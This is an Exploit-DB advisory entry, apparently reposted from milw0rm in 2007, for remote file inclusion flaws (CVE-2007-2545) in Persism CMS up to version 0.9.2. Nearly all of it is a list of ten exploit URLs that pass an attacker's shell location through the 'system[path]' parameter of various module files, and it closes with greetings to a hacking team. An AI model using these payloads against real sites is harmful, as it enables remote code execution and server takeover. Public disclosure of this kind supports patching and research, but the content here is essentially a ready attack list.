Persism CMS <= 0.9.2 - systempath Remote File Inclusion Vulnerabilities

2007-05-04T00:00:00
ID EDB-ID:3853
Type exploitdb
Reporter GoLd_M
Modified 2007-05-04T00:00:00

Description

Persism CMS <= 0.9.2 system[path] Remote File Inclusion Vulnerabilities. CVE-2007-2545. Webapps exploit for php platform

                                        
                                            # Persism Content Management System &lt;= 0.9.2 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.persism.com/emil/0.9.2/0.9.2.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/modules/blocks/headerfile.php?system[path]=Shell
# Exploit:[Path]/modules/files/blocks/latest_files.php?system[path]=Shell
# Exploit:[Path]/modules/filters/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/forums/blocks/latest_posts.php?system[path]=shell
# Exploit:[Path]/modules/groups/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/links/blocks/links.php?system[path]=shell
# Exploit:[Path]/modules/menu/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/news/blocks/latest_news.php?system[path]=shell
# Exploit:[Path]/modules/settings/headerfile.php?system[path]=shell
# Exploit:[Path]/modules/users/headerfile.php?system[path]=shell
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-04]